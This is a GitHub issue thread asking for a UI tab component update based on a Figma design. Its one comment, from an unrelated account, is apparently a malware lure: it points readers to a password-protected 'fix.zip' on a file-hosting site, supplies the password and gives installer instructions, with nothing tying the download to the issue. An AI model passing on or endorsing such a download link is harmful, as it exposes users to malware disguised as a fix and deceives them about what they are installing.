### ISSUE TITLE
Tab 2.1 update

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1742]
Updates: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=392-22338&node-type=FRAME&cc-version-id=6486990524&m=dev

- Styles changed
- Compact version added

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
